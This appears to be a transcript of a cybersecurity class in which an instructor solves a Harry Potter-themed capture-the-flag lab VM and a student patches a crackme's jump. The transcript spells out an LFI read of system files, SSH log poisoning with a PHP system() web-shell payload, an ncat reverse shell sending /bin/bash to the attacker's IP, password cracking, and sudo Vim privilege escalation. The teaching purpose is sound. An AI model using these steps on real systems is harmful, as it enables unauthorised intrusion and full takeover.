Hey man, let's start the session in a couple of minutes. Yeah.
I still,
Yeah.
I said I still didn't get that thing, man. It didn't work for me.
Which one? Oh,
The
sure. Yeah, the reverse engineering, right?
Yeah, I don't know what's going on. I did exactly what you said I should do, and when I try to
Yeah.
get on command prompt on Windows and then
Yeah.
cd into documents and then
Yeah.
run the command,
Yeah.
it doesn't show anything. It just times out and gets back to the command line.
That's weird. Uh,
Yeah, I
the
don't know.
executable and all, it's all fine, right?
You say?
The executable and all, you were able to, was
Is it
it
possible?
when,
Let me see. Is
yeah,
it possible for me to like share my screen and do it and so you
sure, sure,
see?
sure.
Are you seeing my screen?
Yeah.
All right. Um, it's not this one. Okay. Uh, okay, and then it's on 32 bits. And then let's see, compile. Let's see,
Hi.
Hi, man.
so right here, right?
Yeah.
Let's see. I mean, all these were working. Okay, I got the command and everything. It's just when I
Mhm.
okay, let's go back to right, open, right?
Yeah.
Okay,
You have to click on play.
okay, yeah, I know. Play, all right, and then you said it was right here,
Hmm.
and then up here, right?
Yeah.
All right. GMP.
Remove the short also.
Sure. What about the E?
Remove everything.
So like this?
No, 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 no. Go like remove the enter because there is another space also. The space might interfere as well. Yeah, let's type again. JMP
GMP
00401
00401. No, no,
540.
540.
Yeah,
540. Okay, so we're entering the code for the successful register.
the memory address. The memory address for that one, which is that
Okay, because what I did
00401 540.
before was I entered this top one.
No, no, it has to be 540
Okay,
because you
so
have to add that one, right? Because
right.
the top one is my memory address. I want to go to the successfully registered memory address.
Okay,
right?
because
So
I saw the JNT, so I thought that's just what you're changing. That's what
no, no, no,
probably
no. We
confused me.
have to give the address, right?
Right,
Like yeah, in the Google Maps, you don't enter your address. You want to enter the address of where you want to go.
right.
Okay,
Okay,
so
so
that's why it was not
assemble,
running. Yeah, done.
and then where am I going to do the? Am I clicking on this one too,
Right click
and right clicking on that?
anywhere, anywhere.
Could be anywhere.
Copy to yeah. Say all modification.
Or modification,
Copy all.
copy. Or so which one am I saving? This one on
This
top,
one. Mm.
this top one.
Mm.
So am I saving as a different file or the same file?
You can save it as a different file. Just put a one or something. It's good enough. Yeah.
Save. All right, let me go to my command prompt. See, then one, oh, I think I made a mistake. One, dot, see. Okay. Yeah, that was the
All right.
mistake I made. Yeah, I thought it was just changing the JMP. I didn't know that entering the memory address for the
Yeah,
successful
yeah.
listen. Yeah.
So you need to also like you have to point it to that address. That's what it will do. So instead of going to instead of doing what it was doing at that memory address, it will
Right,
just jump to another memory address where we are getting the successfully registered message.
right,
Right?
all right.
Okay, so we were trying to do a nice CTF in the previous session,
Right.
which we were not able to do because of a little thing. So I solved it by doing something. Actually, I don't know if it's clever or if it's stupid, but
What was the issue?
the issue is like I don't even understand why that was happening. But you see this node.ovf, right?
Right.
So I just renamed the file to OVA instead of OVF.
Okay.
Okay, and it works now. Okay, so this one, for example, this one wasn't working, remember?
Right.
Okay, now this is the same one which is working. All I did was just change the name to .ova.
The extension.
Okay, yeah, the extension. So if you see the .ovf here when you are downloading the file, just
Right.
change it to what? .ova, and you will be able to run it. Okay, it might take a while to come to this screen, but it will definitely run. Okay, I have tried it both on VirtualBox and VMware. It was running very nicely, no issue. All right. Okay, so we'll solve this CTF like the same way always do. Okay. So obviously,
Can you add the name of
yeah,
the
don't
virtual
worry, I have
machine
put
to the
everything.
notes? Okay. All right.
All right. So okay. So first, always either if config or IPA. Okay, and we know our own IP address now, which is this one. Okay,
Okay.
55. Then arcscan local to find out the IP address of the victim machine. And it has to be this one, right? Because it's saying VMware. Okay, so I'll just copy it and nmap minus ss minus sc minus sv and paste, enter. Okay, we have the result and it has only two ports which we can somehow access. So like always, we'll just go to the 80 port. Okay, so we'll go to our browser and 192.168.29.17. Okay, so since this is Harry Potter themed, obviously Harry Potter stuff is going to be here. And immediately I can see that this line is a bit different. Okay, so obviously first I'm going to do one thing, robots.txt like always, but nothing is here. So now some serious black.php is here, and even if I like go to view page source, which you should definitely do every time. Okay, you should always do this. So again, this time there are no clues in the source code. Oh yeah, maybe I already told you a directory.php. Okay, so oh, okay. So this is something which we have talked about in our previous sessions. Okay, what this is do you remember when we used to get the slash etc slash password directly?
Is it the what?
When we used to put you know dot slash something like this,
Yeah.
LFI and RFI, do you remember that? Okay, so I think uh, yeah, okay. So I think this seems to be a hint of sorts. Okay, and I think this is a link. See, there is a .php here, which is different from all the other lines. So I'm just going to copy this and paste it here. And it seems to be the same page. View page source. It's the same code, right? Mostly. Okay, it's the same code, but again, we have this hint here, right? So get file. Do you remember we did this also? See, when $get file or something like this is here, remember your HTML sessions, HTML PHP sessions. That
Right.
means it has a this question mark file equals something, right? Like when we used to do user name equals admin
Right.
and password equals something like that, right?
Right.
Okay. So in get request, it always comes at the top, okay, with get parameters, right? So if this get file is here, that means definitely here is a get parameter file equal to some things, correct? So
Right.
that means if I put a question mark here and file equals slash etc slash password, we might be able to check for LFI, right?
Right.
Okay. Since there is a file thing, there might be a file thing, at least I'm thinking right now. So I'll just click on enter and yes, without any doubt, we immediately got the what? We have the
Password.
etc slash password file. Okay. So in any website, as I have mentioned earlier, okay, if you get to this page only on any website, you will actually get a very nice bounty. Okay. So we have the slash etc slash password page. here. All right. So what we can do is, let us try one thing. Okay. And since we have, you know, we
Where,
have this,
where, where did you open this and just now?
I just clicked. So I have this one. I clicked on view page source. All right.
Okay,
So it comes a bit cleaner,
okay.
much cleaner actually. Okay. So we are going to learn something a little. Okay. So I don't even know how many keys are there, I guess. Let's find. So we are going to learn a thing which is known as uh, SSH log poisoning. Okay. So this is actually very useful when you are solving CTFs, and you will actually get it in some nice CTFs every now and then. Right. So since we have the etc/password file, at first what I'm going to do is we'll try to find a auth.log file. Okay, we'll find a log file which is related to SSH. All right. So what I have to put here is slash var slash log slash auth dot log. Well, the first step to find SSH log poisoning is this one. Okay. So in order to know any vulnerability, at first we have to find out if the system contains that vulnerability, right? Okay, in order to exploit that vulnerability, at first we have to know for certain that, yeah, this vulnerability is there. So we are going to check for SSH log poisoning at first, okay? I'll click on enter and you will see that we have all the data, okay? So we have currently all the data when someone tried to log into this machine using SSH. Okay. All right. So what I'm going to do is I'm just going to I'm going to show it to you. Okay. So if I do this SSH something, okay, at the rate of 192.168.29.17, okay, and click on enter. I click on some random password and I'll click on enter again, and it will obviously be failing, okay, because no user calls something here, okay. But now if I go to this web page and I click on refresh, see, invalid user something from my IP address. Remember, this was my IP address when we checked earlier, okay.
Okay, so the
55 is
log
my
is
IP address.
so the
Yeah,
log is
the log is getting generated here.
keeping track of what you did.
Yeah, yeah, and we have access to that log. That is more important. All right. So again, SSH log poisoning, first step is find slash slash var slash log slash auth dot log. Okay. Number two is try random logging in to check log update, right? And number three is what I'm going to do now is I'm going to send a malicious something. Okay, we'll send a malicious PHP code. Okay, what is the code that we are going to send? Send malicious PHP code, and the code is this one: PHP system $_ get C. Okay. So this you already understand. Okay. This is the same as earlier when we did this, when we got the, you know, this one. Okay. This you already understand. Correct. So
Right.
this one you already understand that we want a parameter and the get parameter and the name is C. Again, when we had file earlier, okay, this get parameter file we can enter something, but then we want another get parameter now, okay, and we want that to be named C. You can name anything here. Okay, I'm just putting C. Okay, so again, this to execute this get parameter, I'm using system. Okay, in system, when you put a system in PHP, system function does just execute whatever is inside the system function in the terminal. Okay, it will just execute, not terminal, in the shell. Okay, it will just execute this get C in the shell. That's it. Okay, it's very simple. That's what I am doing. I am going to send this malicious code so that another get parameter may come here. All right, that's what I want to happen. Okay, so now how will I send this? I'll just copy it and I'll go to my terminal and I'll type SSH and I'll start a quote and paste it at the rate 192.168.29.17. Okay. All right. This is how you do SSH log poisoning. Actually, I just made a mistake, which is I have to put a, okay, in PHP always have to put a semicolon at the end. Okay. Okay. So this is the command to send the malicious PHP code. Okay. We are just going to send this directly through SSH. All right. We are going to send this through what? Through SSH. That's it. It's very easy. Okay. So now I'll click on enter and it doesn't even matter if you put a password or not. Okay. All you need to do is go to the browser and click on enter again and see again we have more, but now we should have another, okay, another parameter which is C, right? Because we executed the C parameter here. Okay, so we should have another parameter whose name is C. So C equals, let's try one thing. Okay, let's try one thing again. What did we do? Whatever we get in the C parameter, we are going to execute it on the shell, right? Okay, whatever C parameter we get is going to be executed in the shell. That is what's happening in the system, right? Remember when we used to do this, this one, right? Do you remember? So how's
Yeah.
this happening? How's this happening? This is going in the system function. Okay. All right. This is going in the system function and the system function is executing a ping command with this as the parameter. Okay. All right. So exactly here we have this parameter. and whatever command we put here is going to be executed by the system function. So when we put ls here, for example, okay, and click on enter, now see, we have some files here at the end. See, again, if we put ls, let's say ls minus l, and if we scroll down again, you will see that whenever we put ls minus l, we get something like this, right? ls minus l. Okay, so this one is empty, but let's say ls minus l dot slash. Okay, so we get something like this, which is what is happening here also. Okay, we are getting the result of ls minus l here. All right, we can already control a lot of stuff here, but what I'm going to do is, we learned a very nice tool yesterday, which is known as netcat. Okay, all right, so that's what we are going to use right now. All right, so what I'll do is I'll create a server here for netcat. Okay, so and c uh, minus lnvp, and I'll put a 1337 port number. I click on enter, so it's listening on this on my attacker machine, and I'll go to the victim machine, victim this browser at least, and I'll again use the same netcat. Okay, and what was my IP address? 192.168.29.55, I think. Okay, and do you remember we used this command? Uh, so I've already done SSH log poisoning. So do you remember we use this, right? And see, or you can even put ncat, it's the same thing. Okay, 192.168 point minus e slash bin slash bash,
Yeah.
right?
Yeah.
Okay, so if we put minus e slash bin slash bash, I really hope this works. I click on enter, and it didn't work. Why didn't it work? And c equals ncat. Did I get the IP address correct? Minus e slash bin slash bash and cat. So that this here. Okay, let's see. Did I get the IP address wrong? Okay, let's try IPA and 29. Okay, and obviously, as we remember, this IP address was 17. And just make it larger. 19. Oh yeah, I think what I need to do is no, actually I don't need to do that. And cat, let's try it and see. And let's go with and cat once more. Okay, it's just very weird. minus e slash pin slash. Oh yeah, sorry, I'm so sorry. I just made a very silly mistake. Can you tell me what's the silly mistake that I made? I have to specify the port number also, right?
Right.
Okay. I forgot the port number. So this kind of mistakes happen. Okay. Okay. So now this will just keep on going like that, and you will see that, yeah, connect to something, something, something. So if I put ls here, you will see, or ll, I guess ls minus la will work. Yeah. So I'm able to access the system now. Okay. Again, let's move around a little. cd slash ls. So do we have a home here? Yeah, we have a home here. cd home ls. So we have two users here. All right, we have two users here. And which one should we check first? Actually, I just noticed this. What is this? It's a directory. Okay. cd minus okay, cd slash var slash slash html ls. Okay. So ls minus la. See this one? It's just really weird. Okay. So let's try opening this. So cd copy and paste, and yeah, ls sword of Gryffindor. Okay. Copy and paste. Oh yeah, sorry. I have to cd. I'm thinking that this is, oh, this is not a folder. Okay. So ls minus la v. Oh, sorry, what am I doing? ls minus la. Yeah. So there are two files here. Okay. This one obviously has to be a kind of dictionary file, and then we have another file. Okay. So if we do a cat dot secret dot dic, so we have a very long list of things here. All right. And then let's do a cat sword of Gryffindor. So yeah, so we have a password and the username Lestrange. All right. So what I think we should do is we should try cracking this one. Okay. So let's just, what should we use? Hashcat. Let's just try using John. Okay. So what I'll do is I'll just touch hash dot txt. Okay. And vim dot txt. I'll just copy this and paste it here. Okay. And I also need a word list. So vim word list dot txt. Let's use it. I'll just copy all of this. Okay. Copy and paste here. Okay. So John word list equals to what was the file wl.txt and then hash sorry hash.txt is the one that we want. Okay. And immediately we have the crack. Okay, we cracked the password with just one thing. Okay, so this is the one we used. Okay, I'll just put it here. Okay, so we used John. Okay, and we cracked it in a second. All right, mainly it was actually easy because this does not have many passwords. Okay, so this only has like a what 100 passwords or so, but usually it will take
What's
way longer
inside?
if you. Sorry,
What'd you put inside the wl.txt?
I put all of this.
Okay, all of that. Okay.
Yeah, yeah. The word list that we got from here, right?
Right.
Okay. So I just put it in the wl.txt. Okay. So as I was saying, this is actually kind of a very short word list. So it's taking less than a second to crack and get the password, right? Okay. But it will definitely take way longer when you use a proper word list like rocky.txt. Okay. It will take hours, okay, 8 to 9 hours easily. All right. So now what I'm going to do is I'll what I'll have to go to let's try logging into less trends. So we had looked around like okay, let's just go to cd/home and we can see that there are two users in the home folder and this seems to be the password. Okay, I hate Harry Potter seems to be the password. So SULESTRANGE Lestrange and see nothing happens here. Okay, okay. Nothing happens here because we don't have a shell right now. Okay, this is just a temporary shell. We need a proper shell. So we had done that, right? Spawning a shell. Okay, we have spawned a shell before in when we were doing what happened to this website, man. Okay, so all we need to do is we copy this, okay, and we paste it here. We click on enter. Okay, that's weird. It did not work. Okay, maybe we'll use a different one. Let's try this. Copy, paste, enter. Okay, wait. Who am I? W. Okay, why is none of these working? Let's try a different one. Python. Let's try the Python. Copy and paste. And wow, this CTF is good, right? It's not straightforward at all. That's why when I solved it a few months ago, I really liked it. And Okay, from within and map from where within VI, exact or referral within VI copy. We can try this one. So what we can do is Vim, yeah, okay. What was it? Okay. Oh damn it, we disconnected. Okay, we'll just connect to it once more. Okay, and we have it again, ls. Okay, so cd slash home and ls once more, so cd prance. Okay, yes. Oh, we have this there. So cat readme.txt. I want to escape from the prison of a seven. Ha ha ha. Really though, me, what I was and still am the most loyal servant. Okay, so pwd. Okay, let's do one thing. Cd dot dot and ls cd bellatrix ls. Yeah, we actually have a lot of files here. Okay, ls minus la. So what are these? These are all directories. Okay, I'm not going inside all of these, but cat flag.txt. Oh, we actually have one flag already. Okay, that's weird. Okay, so we got one flag. We got the user flag. Okay, all right. And I guess we need one admin flag also. Okay, they have drawn Dobby here. Okay, all right. So what should we do? What should we do? Um, let's try one of these again because I am sure one of these would work. Ruby from within VIOS system, Python, VNS, Perl is not there. So we'll just try this one. You see, this is the one that I like the most because it's really short and it almost always works, but it didn't work today. That's really weird. Okay, let me see. Let me think for a second. I really. Do you guys have a guess? What might be good here?
No, I haven't clue.
Even I'm thinking. I solved it like a really good while ago, and it was it seemed very easy at that point, but why am I completely forgetting this now? Until now, have you understood everything?
I think so a little bit.
Yeah,
So you have to try and solve it, okay? Uh, This is the one which should have worked no matter what. Also, yeah, there is one thing I have forgotten. Sometimes because see, when I put who am I, it is WW data, right? But where PW represent working directory is this one. But since WW data is the server, okay, is the
Mm.
server, all right. So if I go to slash var slash WW slash HTML, so this one actually has permissions inside here only, right? So yeah, so we can try this one again here. Ah, damn it. Should have worked actually. Maybe it's something wrong with the um CDF. Python. Okay, yeah, there is one more thing. Oh, sorry. I'll have to type it. Nowadays, Python is not very common. This is a problem that I have been facing a lot recently. Right? Come on. What was the thing? This one. Okay. I'll just copy it and paste it here. Python is not that common anymore. So maybe if I put Python 3, oh man, finally. Okay, you see that? Okay, it's like I hate the fact that Python and Python 3 are two separate commands, and it's just really very inconvenient sometimes, like right now. Okay, but anyway, at least we got it working. So we have a shell here, so we can run commands like su now. So switch user, we're going to switch user to, you know, which user do we need? Lestrange, right? Lestrange. Lestrange. And the password is this one. Okay, I'll copy this and paste it here. And we have this user now. Okay, so we are a user properly now. So who am I? Lestrange. Okay, all right.
Uh,
So even though I did not write every single step, I wrote the most difficult steps. Okay. So just give it a try once. And if you are not able to solve, but definitely just try and solve as much as possible by yourself. Okay. So
Okay.
let's then, so ls cd dot ls, okay, pwd is slash home slash reference, okay, ls. So again cat dot txt is okay. Yeah, let's just try to be root. Okay, so cd slash root, cd slash root. Okay, it's obviously restricted. So there was a command. Wait, I forgot the command. Let me find the command once. And it's a very useful command, and I just want you to memorize it because it's very useful. Okay. Uh, Actually, you know what? The command, the one that I'm trying to find, I'm not able to remember. But in the next CTF, I'll show you. But there's a simple one also. You can just do command sudo -l. Okay. And do you know what it will show you? It will show you the tools that require sudo. Okay, that you need to be root user of. All right. Okay. So let's see what sudo permissions that this user has, and it's only this one. Okay, Vim. So using Vim, we have sudo permission, and see, if you see a no password here, that means you are extremely lucky. That means if you want to exploit, not exploit, if you want to use Vim, for example, okay, using this account, you don't need a password. That means we can directly get the shell using Vim. Okay, so we'll just let me just show you. Okay, what I'm going to do is, I guess I have not explained the last part properly. I'll just show it to you once more. Okay, so control L is not going to be working here. When you use the command sudo -l, okay, dollar sudo -l. All right, what you will see is this user, this particular user that I'm logged in as right now. What does this user have permissions of? Okay, what sudo permissions does this user have? Okay, so usually a long list will come here. Okay, for example, sudo -l. Okay, so it it says all. Okay, but this one, okay, and see, no password. This is the more important thing. So it can execute what? Vim using sudo. Okay, but we don't just want to execute Vim using sudo. We also want to get the proper root, right? So there is a vulnerability that we are going to use. Okay, what I'm going to do is sudo vim, because we have root permission. Okay, we can use sudo with vim using this user. Okay, and then -c colon, I think it was, yeah, /bin/bash. Okay, and you click on enter, and see, we have the root user. So if I give ID 0, who am I? Root. Okay, what was the command that we used? We used this command, okay, to get root. Okay, so now if we go to cd/root, we can get the root.txt. So cat root.txt, and we will get the root flag. So copy this and paste it here. Okay, any doubts in this CTF? It's actually kind of
So,
intermediate
so,
level. Okay,
so some
yeah, yeah,
commands you have to like, for you to get like root shell or use the shell, you have to
yeah.
like Google and stuff to look for how to get
Yeah,
that.
so this one obviously I Google, okay, but I just showed you directly. But like when, like this one you have to remember, okay, which one? The sudo -l. Okay, this is one that you have to remember. Okay, just memorize it right now. Don't forget it. Okay, this just you have to remember, because we need this to find the different permissions, the different sudo permissions that the user has. Okay, Then whatever result we get from here, for example, this one, okay, this, okay, this is the hint here. So what I'm going to do is I'll just go and search Vim root exploit or something like this. Okay, exploiting sudo rights. Why do we need a long article for this? Just give me the answer. See, okay, where did it go? Test dot sh.
It's right up.
Yeah, they have. I'm sure he has put a Vim also somewhere. Files part one, spawning a TTY shell. Yeah, this one. Cat prog version. So basically, you will find it that way mostly. Okay, I'm just getting boring articles right now. Okay, but what we did was we used Vim. Okay, Vim is a text editor, but we used Vim and we got the root that way. Okay, so this is where you start Googling. Okay, this is where you start Googling for the exploit. Okay, when you get this result. All right. And apart from that, uh, yeah, these things you can always Google search. Okay, this is fine. This you can put ncat sometimes and netcat sometimes. So I use ncat because here there was a hint. Okay, hint ncat is the key. Okay, so they put as ncat, so I thought it will work as ncat, and yeah, it worked as ncat here. Okay, instead of nc, I did not use nc. And yeah, and you got to learn this cool new attack, okay, which is known as SSH log poisoning. The thing is, I can like teach you for 1 year the different vulnerabilities, or you can just solve different CTFs after learning the fundamentals, and you can find even more exploits every day just by solving CTFs. Okay, so that's why in my sessions I do CTF. Okay, this is one of the only trainings that also focuses a lot on CTF. So we'll be doing at least a couple of more kind of difficult CTFs, okay, so that we can cover more ground when it comes to, and then yeah, we'll be actually, you will also have like, I'll not be covering those classes, but there are going to be some more CTF sessions, okay, so you'll be connecting to the Rex Academy CTF server and you'll be solving CTFs there. Okay, so that's what we are going to do. Right. So again, any more doubts? It was kind of easy, just you needed to know SSH log poison. Okay, this is the only new concept here. Rest is mostly we have covered one way or the other. Doubts? Any doubts?
Uh, none right.
Hmm?
None right now.
Not right now. Okay, what I want you to do is go through this CTF, okay, and take your time. Okay, take your time, and I'll even give you, wait, I'll give you the link also to the solution. Uh, Actually, don't search for a solution right now because you can again watch this video if you want to. So just do one thing, go through this, okay? You will find all the answers there only. And I want you to solve it very nicely, you will be able to do it. I'm pretty sure. Okay. Okay. Will be really. I'm really sure that you're going to be able to solve this even without looking at this. Okay. You will be able to solve it. It's very easy. Just go ahead and do it. And if you have any doubt, just ask me in the next session. And in fact, I'm sure you'll have a couple of doubts, and I really want you to ask me those in the next session.
Okay.
All right.
All right.
So also for the next session, just go through, like, we have a couple of days till the next session, right? So just go through the entire course, okay, and whatever we have learned, and try to find out other doubts that you have, okay, and we'll just take some good time and solve some of those doubts, okay.
Sir, one more thing.
Yeah.
I can't attend the class on Monday. I have
All
an
right.
exam. Yeah, I have an exam on Monday at 7 p.m.
Okay. So
Yeah,
should
so
we do one thing? Actually, I also had some work on Monday. So it will be kind of convenient for me also if we don't have the Monday class. But then actually I only wanted to do it because we need to finish up the course as much as possible, as soon as possible, right? Because we have 12 more sessions before you start your practicals. So okay,
okay,
let's do
okay,
one thing then. Let's do the next session directly on Tuesday.
okay,
All right.
What
okay.
kind of practical are you talking of?
It will be mostly solving CTFs.
Okay.
Yeah, I think Sai will give you the briefs when this session is over. Our sessions are going to be over soon, and only 12 sessions are left. So yeah, we'll go through some of the more difficult things in the next 12 sessions. Okay. And more difficult, slightly more difficult. Okay, nothing that you cannot do. You can easily. So as far as I am concerned, you guys are doing fantastic in these sessions. Okay, your the progress is really good. You obviously need a lot of practice. Okay, and that is true for anyone who is going through this kind of course for the very first time. So what we're going to do is we're going to do a bit more practical stuff like CTFs, and we will also do some theoretical stuff, and mostly we're going to learn things which are going to be extremely useful for your whatever exams that you're going to appear in. Okay, so that's what we are going to do in the next 12 sessions. We'll solve some questions as well, and I'll give you some resources.
Okay.
All right.
Okay. All right.
Okay. So see you on Tuesday, guys.
All right. Thank you.
Thank you.
You didn't give us a paste bin.
Oh, I didn't even know. Okay, just give me one. All right. Here's the link. Okay. Thank you, guys. See you soon.
Thank
All right.
you.
Thank you.
Bye.